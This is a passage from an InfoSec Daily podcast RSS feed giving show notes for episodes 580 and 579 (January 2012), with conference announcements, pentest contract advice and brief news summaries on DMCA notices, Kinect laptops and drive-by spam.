		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 29 Jan 2012 02:52:44 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3424</guid>
		<description><![CDATA[Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez. &#160; Guests: frontpage, connection, oncee, spridel &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this [...]]]></description>
			<content:encoded><![CDATA[<p><b>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z</b></p>
<div style="background-color: transparent"><b><span>InfoSec Daily Podcast Episode 580 for January 28, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez.</span></b></p>
<p>&nbsp;</p>
<p><b>Guests: frontpage, connection, oncee, spridel</b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heros</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p><b><br />
		<span>Information Security Blogger Awards 2012</span><br />
		<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>http://www.ashimmy.com</span></a><span>.</span></b></p>
<p><b><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></b></p>
<p><b><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span>Schmoocon Epilogue</span><br />
		<span>When: After Schmoocon</span><br />
		<span>Where: Washington, DC</span><br />
		<span>Hit up anyone in NOVA Hackers</span></b></p>
<p><b><span>Metasploit Framework Unleashed Cincinnati</span><br />
		<span>When: February 11, 2012. </span><br />
		<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
		<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
		<span>$20 donation for #HFC</span></b></p>
<p><b><span>Social Engineering Training</span><br />
		<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: Seattle, Washington<br />
		<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: Black Hat Vegas<br />
		<span>When: August 20-24, 2012</span><br />
		<span>Where: &nbsp;Bristol, UK</span><br />
		<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: &nbsp;Columbia, MD <br />
		<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<span>Huntington, West Virginia </span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP closes March 30!</span></b></p>
<p><b><span>LayerOne 2012</span><br />
		<span>When: May 26-27, 2012</span><br />
		<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
		<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Pentest Lessons:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span> </span><span>https://twitter.com/pentestlessons</span></a><span>.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 1: </span><span>If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &nbsp;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &nbsp;Also, when you talk to a lawyer, don&rsquo;t make small talk. &nbsp;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 2:</span><span> Depending on the nature of your pentest, consider adding geography into the scope agreement. &nbsp;Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. &nbsp;The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 3:</span><span> Many small-business IT outsourcing firms are now tacking &ldquo;Security&rdquo; onto their product offerings (for example &ldquo;Bob&rsquo;s Computers: Service, Sales, Security&rdquo;). &nbsp;As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking if backups are being stored offsite, and that user drives have appropriate permissions. &nbsp;Fear not, there&rsquo;s a resource for this: THE PTES. &nbsp;Read it; use the appropriate sections, google the shit out of everything you don&rsquo;t understand.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>[Thanks listener Adam]</span></b></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://arstechnica.com/tech-policy/news/2012/01/twitter-uncloaks-a-years-worth-of-dmca-takedown-notices-4410-in-all.ars"><span>http://arstechnica.com/tech-policy/news/2012/01/twitter-uncloaks-a-years-worth-of-dmca-takedown-notices-4410-in-all.ars</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>On almost any given day, Twitter receives a handful of requests to delete tweets that link to pirated versions of copyrighted content&mdash;and quickly complies by erasing the offending tweets from its site.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>But Twitter has taken the unusual step of making DMCA takedown notices public, in partnership with Chilling Effects, a project of the Electronic Frontier Foundation and several universities. The site shows 4,410 cease and desist notices dating back to November 2010. While most of 2011 shows daily or near-daily activity, there is just one notice in January 2012, suggesting either that Twitter is suddenly receiving fewer DMCA takedown notices or that the database is not quite up to date.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Twitter was already submitting data to Chilling Effects prior to this week, but this latest iteration makes it easier for users to locate Twitter-specific takedown notices. If you search the Chilling Effects site, you can also find many thousands of DMCA notices issued to Google, but Facebook has kept its own notices private.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars"><span>http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars</span></a></b></p>
<p><b><br />
		<span>Kinect&#039;s vision and depth perception technology could soon be integrated into laptops. </span><a href="http://www.thedaily.com/page/2012/01/27/012712-tech-kinect-laptop/"><span>The Daily</span></a><span> has seen two prototypes, believed to be from Asus, that incorporate an array of sensors above the top of the screen, replacing the traditional webcam. Below the display are a set of LEDs. Sources at Microsoft confirmed to </span><span>The Daily</span><span> that the laptops contain versions of the Kinect sensor.</span></b></p>
<p><b><span>Asus has dabbled with Kinect-like systems before. Its </span><a href="http://arstechnica.com/gadgets/news/2011/01/kinect-designers-to-debut-motion-controller-for-pcs.ars"><span>Xtion PRO</span></a><span> PC peripheral uses sensor and software technology licensed from </span><a href="http://www.primesense.com/"><span>PrimeSense</span></a><span>&mdash;technology also found in Microsoft&#039;s Kinect sensor.</span></b></p>
<p><b><span>What the sensor might be used for is anybody&#039;s guess. The </span><a href="http://arstechnica.com/business/news/2011/10/kinect-for-windows-sdk-going-commercial-in-early-2012.ars"><span>Kinect for Windows</span></a><span>&mdash;a version of the Xbox 360 accessory with revised firmware to support close-up operation&mdash;will be released in </span><a href="http://arstechnica.com/microsoft/news/2012/01/ballmers-bow-at-ces-short-on-surprises-except-for-that-tweet-choir.ars"><span>February</span></a><span>, and with that, third-party applications that use the sensor will start to arrive. Windows 8 might even include direct support for Kinect-powered features: documents </span><a href="http://www.neowin.net/news/microsoft-details-early-windows-8-improvements-to-oems"><span>leaked in 2010</span></a><span> hinted at Kinect integration with automatic user switching using face detection.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html"><span>http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Attackers have developed a new way to infect your PC through email &#8212; without forcing you to click on an attachment.</span></b></p>
<p><b><br />
		<span>According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when am email is opened in the email client. The user doesn&#039;t have to click on a link or open an attachment &#8212; just opening the email is enough.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://blog.hacktalk.net/how-to-do-it-wrong/"><span>http://blog.hacktalk.net/how-to-do-it-wrong/</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>As I&rsquo;m sure many of you HackTalkers have read, UFC.com was recently defaced which led to Dana White essentially daring Anonymous to do it again.</span></b></p>
<p><b><br />
		<span>I see stuff like this time and time again, a hacking forum will get pwned by some group and after picking up the pieces, the site which got hacked will talk crap about their attackers and essentially dare them to try it again. Inevitably the site will be hacked again because the administrators of the site are still leaving gaping security holes in their site. This is something that has been done time and time again.</span></b></p>
<p><b><span>This doesn&rsquo;t relate only to hacking either. In pretty much every walk of life, if someone kicked your ass once you can be certain they can do it again, especially if you egg them on.</span></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3424/0/infosec-daily-podcast-episode-580.mp3" length="18977148" type="audio/mpeg" />
		<itunes:duration>0:39:32</itunes:duration>
		<itunes:subtitle>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez.
&#160;
Guests: frontpage, connection, oncee, spridel
&#160;
Announcements:
Unsung Heros
H[...]</itunes:subtitle>
		<itunes:summary>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez.
&#160;
Guests: frontpage, connection, oncee, spridel
&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

		Information Security Blogger Awards 2012
		Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
Schmoocon Epilogue
		When: After Schmoocon
		Where: Washington, DC
		Hit up anyone in NOVA Hackers
Metasploit Framework Unleashed Cincinnati
		When: February 11, 2012. 
		Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
		https://msfucincy.wordpress.com/
		$20 donation for #HFC
Social Engineering Training
		When: March 5-9, 2012
		
Where: Seattle, Washington
		When: July 21-24, 2012
		
Where: Black Hat Vegas
		When: August 20-24, 2012
		Where: &#160;Bristol, UK
		When: &#160;November 12-16, 2012
		
Where: &#160;Columbia, MD 
		http://www.social-engineer.com/social-engineer-training
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		Huntington, West Virginia 
		http://aide.marshall.edu
		CFP closes March 30!
LayerOne 2012
		When: May 26-27, 2012
		Where: Clarion Hotel &#8211; Anaheim, CA
		http://www.layerone.org
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Pentest Lessons:
Adam Compton &#38; Zac Wagle&#039;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.

		
Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &#160;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &#160;Also, when you talk to a lawyer, don&#8217;t make small talk. &#160;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attentio[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 579 &#8211; Dude, Where’s My Porn?, Please Pass the Tinfoil, Virus Inception: Birth of Skynet, Spamvertisement Squatnet &amp; All Your DoD Are Belong To Us</title>
		<link>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us</link>
		<comments>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us#comments</comments>
		<pubDate>Sat, 28 Jan 2012 02:03:09 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3419</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 579 for January 27, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
